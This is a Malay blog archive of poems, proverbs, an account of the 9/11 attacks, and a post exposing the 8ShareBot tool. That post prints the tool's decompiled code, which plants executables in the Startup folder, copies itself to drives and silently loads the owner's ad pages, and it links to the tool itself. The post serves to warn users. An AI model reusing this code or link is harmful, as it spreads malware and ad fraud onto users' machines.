Malaysiaku Hari Ini



(Sempena 16 September 1963)

Malaysiaku hari ini sudah mampu tersenyum bangga

berpijak diatas tanah sejahtera
yang dulu peritnya menancap ke dada
membedil ke jiwa anak bangsa
namun berkat akal bijaksana
kita bancuhkan madu dari cuka.

Telah separuh abad

kita hirup nafas merdeka 
dan minum dari sungai 
yang dulu hanyir dengan
darah pejuang sakti negara
yang tak kenal akan lelah lalu
kita bangkit dengan restu seluruh warga
bersatu dibawah payung perpaduan
destinasi merdeka terlaksana.

Di rumah yang selesa ini

anak bangsa diajar kira,tulis dan baca
kita sudah mampu menyentuh awan
malah sudah sampai ke bulan

Benar hari ini kita telah berada seiring

kehadapan kenderaan kemajuan
tapi kadang kita harus waspada
dan jaga-jaga
kerana singa tidak akan pernah kenal
kawan atau tuan.


AK Kelana

Setiu

Bongkar:Disebalik Tool 8Sharebot by SiPenjualAiskrim

hexrut Wrote:Kerana ramai yang tanye aku, knape tool 8sharebot kau lepas pakai ade keluar spa.exe dan fiber.exe kt startup?

Jawapan : Tool 8sharebot tu bkn hexrut punye, owner tool tu adalah Si Penjual Aiskrim (https://www.facebook.com/azimahmad07 )

Atas Permintaan Ramai.. Ak dedahkan ape yang ade di dalam 8ShareBot.exeSpa.exe dan Fiber.exe !

─░mage


8sharebot.exe :- (Drop 2 file iaitu spa.exe dan fiber.exe terus add to startup)

(Melayari iklan 8share owner tanpa anda sedar)

Code:
[spoiler]

Code:
webRequest = WebRequest.Create("http://host.azim-ahmad.my/trafficbot/index2.php");
streamReader = new StreamReader(new WebClient().OpenRead("http://host.azim-ahmad.my/trafficbot/linksubmit.txt"));
WebBrowser51.Navigate("http://host.azim-ahmad.my/ads/8share/1.php");
WebBrowser52.Navigate("http://host.azim-ahmad.my/ads/8share/2.php");
WebBrowser53.Navigate("http://host.azim-ahmad.my/ads/8share/3.php");
WebBrowser54.Navigate("http://host.azim-ahmad.my/ads/8share/4.php");
WebBrowser55.Navigate("http://host.azim-ahmad.my/ads/8share/5.php");
[/spoiler]

Code:
[spoiler]

Code:
Process[] processesByName1 = Process.GetProcessesByName("spa");
if (processesByName1.Length == 1)
processesByName1[0].Kill();
Process[] processesByName2 = Process.GetProcessesByName("fiber");
if (processesByName2.Length == 1)
processesByName2[0].Kill();
string folderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
if (System.IO.File.Exists(folderPath2 + "\\fiber.exe"))
return;
MemoryStream memoryStream1 = new MemoryStream(Resources.fiber);
FileStream fileStream1 = System.IO.File.OpenWrite(folderPath2 + "\\fiber.exe");
memoryStream1.WriteTo((Stream) fileStream1);
fileStream1.Close();
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
if (System.IO.File.Exists(folderPath + "\\spa.exe"))
{
System.IO.File.Delete(folderPath + "\\spa.exe");
MemoryStream memoryStream = new MemoryStream(Resources.spa);
FileStream fileStream = System.IO.File.OpenWrite(folderPath + "\\spa.exe");
memoryStream.WriteTo((Stream) fileStream);
fileStream.Close();
ProjectData.EndApp();
}
else
{
MemoryStream memoryStream = new MemoryStream(Resources.spa);
FileStream fileStream = System.IO.File.OpenWrite(folderPath + "\\spa.exe");
memoryStream.WriteTo((Stream) fileStream);
fileStream.Close();
ProjectData.EndApp();
[/spoiler]


Fiber.exe :- (untuk check dan excute)

Code:
[spoiler]

Code:
string str = Conversions.ToString(Strings.Chr(checked (65 + num))) + ":\\";
if (!File.Exists(str + "\\Melayu Boleh.exe"))
File.Copy(Application.ExecutablePath, str + "\\Melayu Boleh.exe");
private void Form1_Load(object sender, EventArgs e)
{
this.Timer1.Start();
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
if (!File.Exists(folderPath + "\\spa.exe"))
{
MemoryStream memoryStream = new MemoryStream(Resources.spa);
FileStream fileStream = File.OpenWrite(folderPath + "\\spa.exe");
memoryStream.WriteTo((Stream) fileStream);
fileStream.Close();
}
if (File.Exists(folderPath + "\\fiber.exe"))
return;
File.Copy(Application.ExecutablePath, folderPath + "\\fiber.exe");
}
[/spoiler]

Spa.exe :- (Jalankan iklan tanpa pengetahuan untuk keuntungan yang lebih kot )

Code:
[spoiler]

Code:
this.TextBox1.Text = "http://host.azim-ahmad.my/ads/8share/1.php";
this.TextBox2.Text = "http://host.azim-ahmad.my/ads/8share/2.php";
this.TextBox3.Text = "http://host.azim-ahmad.my/ads/8share/3.php";
this.TextBox4.Text = "http://host.azim-ahmad.my/ads/8share/4.php";
this.TextBox5.Text = "http://host.azim-ahmad.my/ads/8share/5.php";
this.TextBox6.Text = "http://host.azim-ahmad.my/ads/8share/6.php";
this.TextBox7.Text = "http://host.azim-ahmad.my/ads/8share/7.php";
this.TextBox8.Text = "http://host.azim-ahmad.my/ads/8share/8.php";
this.TextBox9.Text = "http://host.azim-ahmad.my/ads/8share/9.php";
this.TextBox10.Text = "http://host.azim-ahmad.my/ads/special/1.php";
this.TextBox11.Text = "http://host.azim-ahmad.my/ads/special/2.php";
this.TextBox12.Text = "http://host.azim-ahmad.my/ads/special/3.php";
[/spoiler]

DL Source :- Source Code 8sharebot spa fiber.zip 

DL 8shareBot8.1 Original :- http://host.azim-ahmad.my/files/8shareBot8.1.zip

P/s : Jangan Tanye aku lagi..aku tak ade kaitan dengan semua ini.. bace sini dan tanye owner TOOL TERSEBUT!!!!

*update: version11 tiada spa.exe dan fibre.exe diganti dengan sync.exe pada startup.

Ini bermakna link yang anda masukkan tu cuma hiasan, kemudian anda klik link tuan punya tool tanpa sedar dan memberi keuntungan kepada tuan tool berikut, semakin ramai guna, semakin untunglah beliau. Hidup jangan fikir nak untung mudah. Kepada pengguna tool 8ShareBot mana-mana version pun cepat-cepat la delete. Jangan yang dikejar tak dapat, yang dikendong berciciran. Berminat nak download lagi tak? :3

Kata-kata Hikmah Tentang Cinta

Cinta adalah kekuatan yg mampu
mengubah duri jadi mawar
mengubah cuka jadi anggur
mengubah sedih jadi riang
mengubah amarah jadi ramah
mengubah musibah jadi muhibah.




cinta,kelana cinta,kata kata,hikmah

Cinta itu adalah perasaan yang mesti ada pada tiap-tiap diri manusia, ia laksana setetes embun yang turun dari langit, bersih dan suci. Cuma tanahnyalah yang berlain-lainan menerimanya. Jika ia jatuh ke tanah yang tandus, tumbuhlah oleh karena embun itu kedurjanaan, kedustaan, penipu, langkah serong dan lain-lain perkara yang tercela. Tetapi jika ia jatuh kepada tanah yang subur, di sana akan tumbuh kesuciaan hati, keikhlasan, setia budi pekerti yang tinggi dan lain-lain perangai yang terpuji.
-Hamka

Cinta bukan mengajar kita lemah, tetapi membangkitkan kekuatan. Cinta bukan mengajar kita menghinakan diri, tetapi menghembuskan kegagahan. Cinta bukan melemahkan semangat, tetapi membangkitkan semangat.
-Hamka

Tanda cinta kepada Allah adalah banyak mengingat (menyebut) Nya, karena tidaklah engkau menyukai sesuatu kecuali engkau akan banyak mengingatnya.
-Ar Rabi’ bin Anas (Jami’ al ulum wal Hikam, Ibnu Rajab)

Aku tertawa (heran) kepada orang yang mengejar-ngejar (cinta) dunia padahal kematian terus mengincarnya, dan kepada orang yang melalaikan kematian padahal maut tak pernah lalai terhadapnya, dan kepada orang yang tertawa lebar sepenuh mulutnya padahal tidak tahu apakah Tuhannya ridha atau murka terhadapnya.
-Salman al Farisi (Az Zuhd, Imam Ahmad)

Sesungguhnya apabila badan sakit maka makan dan minum sulit untuk tertelan, istirahat dan tidur juga tidak nyaman. Demikian pula hati apabila telah terbelenggu dengan cinta dunia maka nasehat susah untuk memasukinya.
-Malik bin Dinar (Hilyatul Auliyaa’)

Cintailah kekasihmu sekedarnya saja, siapa tahu nanti akan jadi musuhmu. Dan bencilah musuhmu sekedarnya saja, siapa tahu nanti akan jadi kekasihmu.
-Ali bin Abi Thalib

Engkau berbuat durhaka kepada Allah, padahal engkau mengaku cinta kepada-Nya? Sungguh aneh keadaan seperti ini. Andai kecintaanmu itu tulus, tentu engkau akan taat kepada-Nya. Karena sesungguhnya, orang yang mencintai itu tentu selalu taat kepada yang ia cintai.
-A’idh Al-Qorni

100 Kata-kata Hikmah

1) Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.

2) Dunia ini umpama lautan yg luas. Kita adalah kapal yg belayar di lautan telah ramai kapal karam didalamnya.. andai muatan kita adalah iman, dan layarnya takwa, nescaya kita akan selamat dari tersesat di lautan hidup ini.

3) Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.

4) Setiap yang kita lakukan biarlah jujur kerana kejujuran itu telalu penting dalam sebuah kehidupan. Tanpa kejujuran hidup sentiasa menjadi mainan orang.

5) Hati yg terluka umpama besi bengkok walau diketuk sukar kembali kepada bentuk asalnya.

6) Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.

7) Ikhlaslah menjadi diri sendiri agar hidup penuh dengan ketenangan dan keamanan. Hidup tanpa pegangan ibarat buih-buih sabun. Bila-bila masa ia akan pecah.

8) Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan. Memberi sedikit dengan ikhlas pula lebih mulia dari memberi dengan banyak tapi diiringi dengan riak.

9) Tidak ada insan suci yang tidak mempunyai masa lampau dan tidak ada insan yang berdosa yang tidak mempunyai masa depan.

10) Kata-kata yang lembut dapat melembutkan hati yang lebih keras dari batu.Tetapi kata-kata yang kasar dapat mengasarkan hati yang lunak seperti sutera.

11) Lidah yang panjangnya tiga inci boleh membunuh manusia yang tingginya enam kaki.

12) Agama tidak pernah mengecewakan manusia. Tetapi manusia yang selalu mengecewakan agama.

13) Nafsu mengatakan perempuan itu cantik atas dasar rupanya. Akal mengatakan perempuan itu cantik atas dasar ilmu dan kepintarannya. Dan hati mengatakan perempuan itu cantik atas dasar akhlaknya.

14) Keikhlasan itu umpama seekor semut hitam di atas batu yang hitam di malam yang amat kelam. Ianya wujud tapi amat sukar dilihat.

15) Hidup memerlukan pengorbananan. Pengorbanan memerlukan perjuangan. Perjuangan memerlukan ketabahan. Ketabahan memerlukan keyakinan. Keyakinan pula menentukan kejayaan. Kejayaan pula akan menentukan kebahagiaan.

16) Seseorang yang bijak melahirkan kata-kata selalunya disanjung sehingga ia mula bercakap kosong

17) Harta akan habis digunakan tanpa ilmu tetapi sebaliknya ilmu akan berkembang jika ianya digunakan.

18) Kekayaan bukanlah satu dosa dan kecantikan bukanlah satu kesalahan. Oleh itu jika anda memiliki kedua-duanya janganlah anda lupa pada Yang Maha Berkuasa.

19) Sahabat yang tidak jujur ibarat dapur yang berhampiran. Jikalau pun kamu tidak terkena jelaganya sudah pasti akan terkena asapnya.

20) Mengapa manusia gemar mencetuskan pertelingkahan sedangkan manusia itu sendiri dilahirkan dari sebuah kemesraan.

21) Kita sentiasa muda untuk melakukan dosa tetapi tidak pernah tua untuk bertaubat.

22) Gantungkan azam dan semangatmu setinggi bintang di langit dan rendahkan hatimu serendah mutiara di lautan.

23) Setiap mata yang tertutup belum bererti ia tidur. Setiap mata terbuka belum bererti ia melihat.

24) Jadikan dirimu bagai pohon yang rendang di mana insan dapat berteduh. Jangan seperti pohon kering tempat sang pungguk melepas rindu dan hanya layak dibuat kayu api.

25) Menulis sepuluh jilid buku mengenai falsafah lebih mudah daripada melaksanakan sepotong pesanan.

26) Jangan menghina barang yang kecil kerana jarum yang kecil itu kadang- kadang menumpahkan darah.

27) Kegembiraan ibarat semburan pewangi, pabila kita memakainya semua akan dapat merasa keharumannya. Oleh itu berikanlah walau secebis kegembiraan yang anda miliki itu kepada teman anda.

28) Esok pasti ada tetapi esok belum pasti untuk kita. Beringat-ingatlah untuk menghadapi esok yang pastikan mendatang.

29) Reaksi emosi jangan dituruti kerana implikasinya tidak seperti yang diimaginasi .

30) Sahabat yang beriman ibarat mentari yang menyinar. Sahabat yang setia bagai pewangi yang mengharumkan. Sahabat sejati menjadi pendorong impian. Sahabat berhati mulia membawa kita ke jalan Allah.

31) Orang yang bahagia itu akan selalu menyediakan waktu untuk membaca kerana membaca itu sumber hikmah menyediakan waktu tertawa kerana tertawa itu muziknya jiwa, menyediakan waktu untuk berfikir kerana berfikir itu pokok kemajuan, menyediakan waktu untuk beramal kerana beramal itu pangkal kejayaan, menyediakan waktu untuk bersenda kerana bersenda itu akan membuat muda selalu dan menyediakan waktu beribadat kerana beribadat itu adalah ibu dari segala ketenangan jiwa.

32) Penglihatan itu sebagai panah iblis yang berbisa, maka siapa yang mengelakkannya kerana takut padaKu, maka Aku akan menggantikannya dengan iman yang dirasakan manisnya dalam hati...

33) "Wanita yang cantik tanpa peribadi yang mulia, umpama kaca mata yangbersinar- bersinar, tetapi tidak melihat apa-apa"

34) "Kekecewaan mengajar kita erti kehidupan. Teruskan perjuangan kita walaupun terpaksa menghadapi rintangan demi rintangan dalam hidup"

35) Tanda Orang Bijaksana Ialah Hatinya Selalu Berniat Suci; Lidahnya Selalu Basah Dengan Zikrullah; Matanya Menangis Kerana Penyesalan (Terhadap Dosa); Sabar Terhadap Perkara Yang Dihadapi Dan Mengutamakan Akhirat Berbanding Dunia.

36) Jika kejahatan di balas kejahatan, maka itu adalah dendam. Jika kebaikan dibalas kebaikan itu adalah perkara biasa. Jika kebaikan dibalas kejahatan, itu adalah zalim. Tapi jika kejahatan dibalas kebaikan, itu adalah mulia dan terpuji."

37) "Hidup umpama aiskrim. Nikmatilah ia sebelum cair"

38) "Kata-kata itu sebenarnya tidak mempunyai makna utk menjelaskan perasaan. Manusia boleh membentuk seribu kata-kata, seribu bahasa. Tapi kata-kata bukan bukti unggulnya perasaan"

39) "Hidup tidak boleh berpandukan perasaan hati yg kadangkala boleh menjahanamkan diri sendiri. Perkara utama harus kita fikirkan ialah menerima sesuatu atau membuat sesuatu dgn baik berlandaskan kenyataan"

40) "Hidup adalah gabungan antara bahagia dan derita. Ia adalah menguji keteguhan iman seseorang. Malangnya bagi mereka yg hanya mengikut kehendak hati tidak sanggup menerima penderitaan.

41) Hadiah Terbaik : Kepada kawan - Kesetiaan Kepada musuh - Kemaafan Kepada ketua - Khidmat Kepada yang muda - Contoh terbaik Kepada yang tua - Hargai budi mereka dan kesetiaan. Kepada pasangan - Cinta dan ketaatan Kepada manusia - Kebebasan

42) "Berfikir secara rasional tanpa dipengaruhi oleh naluri atau emosi merupakan satu cara menyelesaikan masalah yg paling berkesan"

43) "Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri mencucuk diri dan menyakiti orang lain."

44) "Dunia ini ibarat pentas. Kita adalah pelakonnya. Maka berlumba-lumbalah beramal supaya hidup bahagia di dunia dan akhirat"

45) "Akal itu menteri yang menasihati, Hati itu ialah raja yang menentukan, Harta itu satu tamu yang akan berangkat, kesenangan itu satu masa yang ditinggalkan".

46) "Selemah-lemah manusia ialah orang yg tak boleh mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari"

47) "Cakap sahabat yg jujur lebih besar harganya daripada harta benda yg diwarisi dari nenek moyang"

48) "Ingatlah, sabar itu iman, duit bukan kawan, dunia hanya pinjaman dan mati tak ber teman.."

49) "Lidahmu adalah bentengmu, jika engkau menjaganya maka ia akan menjagamu, dan jika engkau membiarkannya maka ia tidak akan mempedulikanmu"

50) "Orang yg paling berkuasa adalah orang yg dapat menguasai dirinya sendiri"

51) "Seseorang menganggap sekatan sebagai batu penghalang, Sedangkan orang lain menganggapnya sebagai batu lonjatan."

52) "Kalau kita melakukan semua yang kita upaya lakukan, sesungguhnya kita akan terkejut dengan hasilnya."

53) "Kita selalu lupa atau jarang ingat apa yang kita miliki, tetapi kita sering kali ingat apa yang ora ng lain ada."

54) "Apa yang diperolehi dalam hidup ini, adalah sepenuhnya daripada apa yang kita berikan padanya."

55) "Fikirkan hal-hal yang paling hebat, Dan engkau akan menjadi terhebat. Tetapkan akal pada hal tertinggi, Dan engkau akan mencapai yang tertinggi."

56) "Dunia ini tiada jaminan melainkan satu peluang."

57) "Kehidupan kita di dunia ini tidak menjanjikan satu jaminan yang berkekalan. Apa yang ada hanyalah percubaan, cabaran dan pelbagai peluang. Jaminan yang kekal abadi hanya dapat ditemui apabila kita kembali semula ke pada Ilahi."

58) "Rahsia kejayaan hidup adalah persediaan manusia untuk menyambut kesempatan yang menjelma."

59) "Kekuatan tidak datang dari kemampuan fizikal,tetapi ianya datang dari semangat yang tidak pernah mengalah."

60) "Mengetahui perkara yang betul tidak memadai dan bermakna jika tidak melakukan perkara yang betul."

61) "Kecemerlangan adalah hasil daripada sikap yang ingin sentiasa melakukan yang terbaik."

62) "Jadikan sebagai aturan hidup untuk melakukan yang terbaik dalam apa jua yang dilakukan, pasti akan menghasil kecemerlangan.

63) “Kehidupan ini dipenuhi dengan seribu mcm kemanisan tetapi untuk mencapainya perlu sejuta macam pengorbanan dan kepahitan..manis tidak akan dtg sendiri”

64) Sehalus-halusnya musibah adalah ketika kedekatan kita dengan Allah perlahan-lahan tercabut. Dan itu biasanya ditandai dengan menurunnya kualiti ibadah.

65) kehebatan orang yang bertawakal itu adalah kerana mereka berserah seluruh jiwa raga kepada ALLAH. Mereka terlalu yakin sehingga percaya pada sandaran Maha Suci ALLAH.

66) Jika kita memelihara kebencian dan dendam, maka seluruh waktu dan pikiran yang kita miliki akan habis dan kita tidak akan pernah menjadi orang yang produktif.

67) Kekurangan orang lain adalah ladang pahala bagi kita untuk memaafkannya, mendoakannya, memperbaikinya, dan menjaga aibnya.

68) Bertambah kuat kepercayaan kepada agama, bertambah tinggi darjatnya di dalam pergaulan hidup, dan bertambah naik tingkahlaku dan akal budinya.

69) Jangan simpan kata-kata cinta pada orang yang tersayang sehingga dia meninggal dunia ,
lantaran akhirnya kamu terpaksa catatkan kata-kata cinta itu pada pusaranya .
Sebaliknya ucapkan kata-kata cinta yang tersimpan dibenakmu itu sekarang selagi ada hayatnya.

70) Sesiapa yang berbohong hilanglah air mukanya dan sesiapa yang buruk akhlaknya banyaklah dukacitanya.

71) Akan datang kepada manusia suatu zaman tidak akan reda mata orang yang bijaksana.

72) Sesungguhnya orang bertalam dua muka bukan seorang yang jujur di sisi Allah.

73) Aku pernah memindahkan batu-bata dan memikul besi, tetapi aku tidak pernah melihat sesuatu yang lebih berat daripada hutang.

74) Tidak ada sesuatu yang lebih meletihkan badan daripada permainan.

75) Aku pernah makan makanan yang baik dan memeluk yang terbaik tetapi aku tidak pernah melihat sesuatu yang lebih lazat daripada kesihatan.

76) Janganlah kamu duduk lama di dalam tandas kerana ia akan mewarisi penyakit buasir.

77) Berdiam diri itu adalah hikmah (perbuatan yang bijak) sedangkan amat sedikit orang yang melakukannya.

78) Sesungguhnya lama bersendirian itu dapat memahami untuk berfikir dan lama berfikir itu adalah petunjuk jalan ke syurga.

79) Kehinaan dalam melakukan ketaatan kepada Allah lebih mendekatkan diri daripada mulia dengan maksiat (perkara menyebabkan dosa) kepada-Nya.

80) Kata-kata nasihat amat menyukarkan bagi orang bodoh, sebagaimana sukarnya berjalan di atas jalan yang tidak rata bagi seorang tua.

81) Sekiranya kamu di dalam solat, jagalah hatimu, sekiranya kamu makan, jagalah kerongkongmu, sekiranya kamu berada di rumah orang lain, jagalah kedua matamu dan sekiranya kamu berada di kalangan manusia, jagalah lidahmu.

82) Tidak ada kebaikan bagimu untuk mempelajari apa yang belum kamu tahu sedangkan kamu belum beramal dengan apa yang kamu tahu.

83) Ingatlah dua perkara iaitu Allah dan mati, lupakan dua perkara lain iaitu kebaikanmu terhadap hak dirimu dan kebaikanmu terhadap orang lain.

84) Bukanlah harta itu seperti kesihatan dan bukanlah nikmat itu seperti jiwa yang baik.

85) Sesiapa yang melihat-lihat keaiban diri, dia tidak akan peduli keaiban orang lain.

86) Sesiapa yang tidak mengenakan pakaian takwa, dia tidak akan ditutupi dengan suatu apa pun.

87) Sesiapa yang reda rezeki Allah, dia tidak akan sedih dengan apa yang ada di tangan orang lain.

88) Sesiapa yang mencabut pedang kezaliman, dia akan memotong tangannya.

89) Sesiapa yang menggali telaga untuk saudaranya, dia akan terjatuh ke dalamnya.

90) Sesiapa yang mencabut hijab (penghadang) orang lain, akan terbukalah auratnya (keaibannya).

91) Sesiapa yang memendamkan sesuatu perkara, dia akan mendapat celaka.

92) Sesiapa yang membahayakan dirinya, dia akan binasa.

93) Sesiapa yang tidak menggunakan akalnya, dia akan dihina.

94) Sesiapa yang bersifat takbur dengan manusia, dia akan dikeji.

95) Sesiapa yang menyelidiki dengan mendalam sesuatu pekerjaan (perkara), dia akan berasa jemu.

96) Sesiapa yang tidak berpengalaman dalam setiap urusan, dia akan dikhianati.

97) Sesiapa yang mengetahui ajal mautnya, akan pendeklah impiannya.

98) Sesiapa yang bersahabat dengan orang rendah akhlak, dia dipandang hina.

99) Kebahagiaan terletak pada kemenangan memerangi hawa nafsu dan menahan kehendak yang berlebih-lebihan. ( Imam Al-Ghazali ).

100) Bahagialah orang yang dapat menjadi tuan untuk dirinya, menjadi kusir untuk nafsunya dan menjadi kapten untuk bahtera hidupnya. ( saidina Ali Abi Talib ).

101) Tahan menderita kepahitan hidup sehingga penderitaan menjadi kekayaan adalah bahagia. ( Hamka ).

102) Kenal akan keindahan dan sanggup menyatakan keindahan itu kepada orang lain adalah bahagia. ( Hamka ).

103) Bahagia sekali orang-orang yang menahan lidahnya daripada berkata-kata secara berlebih-lebihan dan mendermakan hartanya yang lebih. ( maksud hadis).

104) Berbahagialah orang yang dapat menyalahkan dirinya sendiri sebelum menyalahkan orang lain. ( Maksud hadis ).

105) Perluaskanlah bidang dan minat dan kegemaran anda supaya masa anda tidak terbuang dengan sia-sia yang boleh menghanyutkan anda dalam kegiatan atau arus fantasi yang menjahanamkan diri anda.

105) Anggaplah dunia sebagai sebuah tempat yang penuh dengan beraneka perkara menarik yang menunggu anda untuk meneroka dan mempelajarinya.

106) Anda perlu sentiasa bersedia untuk memberi pertolongan, bantuan dan khidmat kepada orang lain.

107) Bersyukur dan bergembiralah terhadap kejayaan dan kemajuan yang dicapai oleh orang lain dan jangan sekali-kali anda merasa cemburu atau iri hati terhadap mereka.

108) Anda hendaklah lebih banyak berfikir dan bercakap tentang pengalaman-pengalaman yang menggembirakan daripada pengalaman-pengalaman yang membawa duka nestapa.

109) Bersyukur dan berpuas hatilah dengan apa yang anda miliki sekarang.Jangan sekali-kali berfikir bahawa anda akan bergembira setelah memiliki perkara-perkara yang tidak anda miliki sekarang.

110) “Bukan semua yang menggembirakan hati kita baik untuk kita. Kadang-kadang yang menggembirakan itu tersembunyi derita. Dan bukan semua yang memualkan hati kita tidak baik untuk kita. Kadang-kadang di situlah letaknya bahagia.”

111)“Biar pendiam tapi berisi, daripada bising menyusahkan orang; biar banyak ingatkan mati, daripada hidup bagaikan arang.”

112) “Paling indah hidup apabila kita mendapat semua yang kita inginkan, tapi paling tak indah bila dah dapat itulah punca masalah hidup kita.”

113) “Pengetahuan adalah teman anda yang terbaik. Ia sentiasa mengikut anda ke mana pun anda pergi. Tatkala semua orang menolak anda, pengetahuan tetap membisikkan sesuatu yang berharga.”

114) “Orang yang banyak duit selalunya tak bawa duit dalam poket tapi kadang-kadang orang yang tak bawa duit dalam poket sebab memang tak berduit.”

115) ”Sembahyang itu ketenangan. Ketenangan benihnya kepintaran, kepintaran itu jawapnya kecemerlangan. ”

116) “Jadilah orang cerdik supaya senang hidup tapi kalau dah terlalu senang selalu jadi tak cerdik.”

117) “Apa nak takut dengan madu, masuk ke perut jadi ubat; tapi takutilah lebah, kalau menyerang boleh padam.”

118) “Tupai kalau tak pernah jatuh ke tanah kira memang pandai, tapi bila jatuh itu tentu terlebih pandai.”

119) “Berlarilah terus hingga ke garisan penamat, sebab perlumbaan yang tidak sampai ke garisan penamat tidak pernah selesai.”

120) “Jika anda mengaku orang jadilah orang, jangan jadi orang-orang.”

121) “Usah mimpi menakluk bintang kalau bulan pun tak kelihatan.”

122) “Jika anda diperdaya orang, itu tandanya anda baik, sebab orang jahat tak akan pilih orang jahat untuk diperdayakan.”

123) “Belumlah seseorang itu layak digelar pendekar selagi dia belum berjuang.”

124) “Jangan takut terlambat. Yang paling bahaya adalah berhenti dan langsung tak bertindak.”

125) “Nak pandai belajarlah, tapi kalau nak memandai-mandai tak payah tunggu pandai.”

126) “Manusia takut pada hantu tapi tak takut berperangai macam hantu.”

127) “Tuhan memberikan kita dua kaki untuk berjalan, dua tangan untuk memegang, dua telinga untuk mendengar dan dua mata untuk melihat. Tetapi mengapa Tuhan hanya menganugerahkan sekeping hati pada kita ? Kerana Tuhan telah memberikan sekeping lagi hati pada seseorang untuk kita mencarinya. Itulah Cinta …

Serangan 11 September 2001



Menara berkembar World Trade Center (WTC) terbakar.
Lokasi : Bandar Raya New York; Kaunti Arlington, Virginia; dan dekat Shanksville, Pennsylvania, semuanya di Amerika Syarikat
Tarikh : Selasa, 11 September 2001
8:46 pagi – 10:28 pagi (UTC-4)
Jenis serangan : Serangan berani mati, perampasan kapal terbang
Kematian : 2,973 mangsa dan 19 perampas
Cedera : 6,000+
Pelaku : Al-Qaeda dipimpin oleh Osama bin Laden[1]

Ilustrasi menunjukkan tempat dua kapal terbang melanggar WTC New York
Serangan 11 September 2001 (juga digelar 9/11) ialah empat siri serangan berani mati yang teratur oleh al-Qaeda ke atas Amerika Syarikat pada 11 September 2001. Pada pagi itu, 19 orang pengganas al-Qaeda merampas empat buah kapal terbang penumpang komersil. Para perampas itu sengaja menghempaskan dua pesawat ke arah Menara Berkembar World Trade Center (Pusat Dagangan Dunia) di Bandar Raya New York, sekaligus mengorbankan nyawa semua penumpang dan kebanyakan pekerja dalam bangunan terbabit. Kedua-dua menara runtuh dalam masa dua jam, menyebabkan bangunan berdekatan turut musnah atau mengalami kerosakan. Mereka juga menghempaskan pesawat ketiga ke arah bangunan Pentagon di Arlington, Virginia, dekat Washington, D.C. Kapal terbang yang keempat pula terhempas di kawasan berdekatan pekan Shanksville di negeri Pennsylvania setelah beberapa penumpang dan kakitangannya cuba merampas semula kapal terbang itu yang dihalakan oleh perampas ke arah Washington, D.C., untuk menyasar Bangunan Kapitol atau Rumah Putih. Semua penumpang keempat-empat pesawat terkorban.

Seramai 3,000 mangsa dan kesemua 19 perampas terkorban dalam serangan.Menurut Jabatan Kesihatan Negeri New York, sehingga Jun 2009, sejumlah 836 orang yang bertindak memberi bantuan untuk tragedi ini, termasuk anggota bomba dan polis telah meninggal dunia.Di kalangan 2,752 mangsa yang terkorban dalam serangan di World Trade Center adalah 343 orang bomba dan 60 orang polis dari Bandar Raya New York dan Lembaga Pelabuhan. 184 orang lagi terkorban dalam serangan ke atas Pentagon. Kebanyakan besar mangsa korban ialah orang awam, termasuk warga 70 negara.Selain itu, terdapat sekurang-kurangnya satu kematian tak langsung, akibat penyakit paru-paru kerana terdedah kepada habuk runtuhan World Trade Center.

Kesangsian cepat dilemparkan ke arah al-Qaeda. Ketuanya, Osama bin Laden mula-mula menafikan bahawa dia terlibat, tetapi pada tahun 2004, akhirnya, beliau mengakui bertanggungjawab mendalangi serangan itu. Amerika Syarikat bertindak balas terhadap kejadian ini dengan melancarkan Perang Terhadap Keganasan, menyerang Afghanistan untuk menjatuhkan kumpulan Taliban yang melindungi ahli-ahli al-Qaeda, serta menggubal Akta PATRIOT Amerika Syarikat. Pada Mei 2011, barulah bin Laden ditemui lalu dibunuh. Banyak lagi negara lain yang turut mengukuhkan perundangan anti-pengganasan serta menambah kuasa penguatkuasa undang-undang. Beberapa bursa saham Amerika ditutup sepanjang minggu selepas serangan, kemudian mencatatkan kerugian teruk sebaik sahaja membuka semula, terutamanya industri penerbangan dan industri. Kemusnahan ruang pejabat bernilai beribu juta dolar telah menyebabkan ekonomi Lower Manhattan teruk terjejas.

Kerosakan Pentagon dibersihkan lalu dibaik pulih dalam masa setahun, dan sebuah Tugu Peringatan Pentagon didirikan dekat bangunan itu. Proses pembinaan semula telah dilancarkan di tapak World Trade Center. One World Trade Center yang baru kini sedang dibina di atas tapak itu dan baru siap pada tahun 2013. Beberapa lagi menara sedang dibina di atas tapak itu bermula tahun 2007 hingga 2013.

sumber

Diperantauan

perantau,kelana cinta,sajak,cinta,kelana,aidilfitri

Kuranduk alam subuh
keheningan fajar pagi
bahang takbir merasuk
rasa sebak mencengkam

Daku rindu akan
hari-hari terakhir Ramadhan
suasana desa nan permai
hilai tawa anak kecil berpeleseran
takbir raya di corong masjid
rasa lemang dan nasi dagang

Telah hilang keindahan itu
dalam deras arus kota
sungai manusia yang sibuk
bermacam hala dan ragam tari

Bonda…
berbatu jarak ini terpisah
kurapatkan sedulang khilaf
kususun sepuluh jari
merafak ampun dan maaf
dari merah tapak kaki
dari kecil ibu jari

Di perantauan ini dalam sebak dan hiba
kuratah keampunan
kuteguk kemaafan
darimu bonda

membasuh dosa lalu.

Iftar Tadi



Iftar tadi
berceratuk mengelilingi meja
kita cucuhkan obor jingga
di ufuk senja penuh tawadduk
dan restu
kita bakarkan waktu
melebur penantian.

Iftar tadi
azan di corong masjid
memecah keheningan alam kirmizi
minda-minda yang runduk
menyimbah tahmid
ke lengkung tasbih
doa kudus menyibak serata alam.

Kita susuri Ramadhan ini
ritual pengabdian diri
wadah mencapai iffah
yang payah
mahar tiket syurga
yang tidak murah.

Waktu sentiasa hangus -
pagi dan senja tadi
dalam catatan-Nya.

AK Kelana
Desa Putera Jaya

Menjemput Taubat

menjemput taubat,cerpen,ak kelana,kelana cinta

(26 Mei 2014,12.24 AM)
(31 Mei 2014,8.21 PM)

AK Kelana

